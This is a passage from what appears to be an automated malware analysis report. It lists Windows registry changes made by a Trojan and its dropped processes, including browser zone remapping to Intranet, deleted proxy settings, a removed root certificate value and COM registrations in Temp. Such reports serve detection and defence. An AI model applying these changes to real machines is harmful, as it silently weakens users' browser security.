[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\ActSys]
"instid" = "FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"E9C15E05782C5BADC4287A994D1DDEDB171B8B2A"
The process ActSys.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 BC 36 45 A7 A1 90 29 04 1B E2 92 15 F3 1E 25"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 4B 0A E5 61 BA 54 65 0D 62 D2 C3 BD 6C 11 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: HTk3wxj1YXaXLjmPTfdUb6)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"DisplayVersion" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"QuietUninstallString" = "%Program Files%\WNet\uninst.exe"
"UninstallString" = "%Program Files%\WNet\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cmdshell.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F CE A6 C2 99 E6 A4 9B 41 99 37 6E 2F D6 4A 3B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process amisetup5755__9664.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCR\espial.deiform]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
"(Default)" = "IBoot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
"(Default)" = "{89c1a748-b869-4016-8319-4d690ad9fb4a}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
"(Default)" = "espial.deiform"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\espial.deiform.1\CLSID]
"(Default)" = "{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"(Default)" = "{89C1A748-B869-4016-8319-4D690AD9FB4A}"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\espial.deiform.1]
"(Default)" = "Inst Class"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
"(Default)" = "InstallerLib"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1429772524"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
"(Default)" = "Inst Class"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 CA 87 11 14 2E 2D 07 1C 5A 41 3E 05 2D 8C 64"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup5755__9664.exe"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
"(Default)" = "espial.deiform.1"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\espial.deiform\CurVer]
"(Default)" = "espial.deiform.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
[HKCR\espial.deiform.1]
[HKCR\espial.deiform\CurVer]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
[HKCR\espial.deiform.1\CLSID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Programmable]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}]
[HKCR\espial.deiform]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level"
The process nfregdrv.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 2D A1 B6 B6 CA 07 B2 99 CE D4 A8 0D 24 2A C5"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process nfregdrv.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC B8 71 18 71 E6 BE 5D 5D 3B 37 A7 5B 5E C1 72"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process %original file name%.exe:1396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 9A DA 6E 4F 35 B6 2A A8 D8 19 6A D6 1E 73 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp]
"QQBrowser.exe" = "QQæµÂ览器"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D8 12 C4 55 2B 78 AC 9B 09 50 FE EC 40 EE 4A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process CashReminder.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
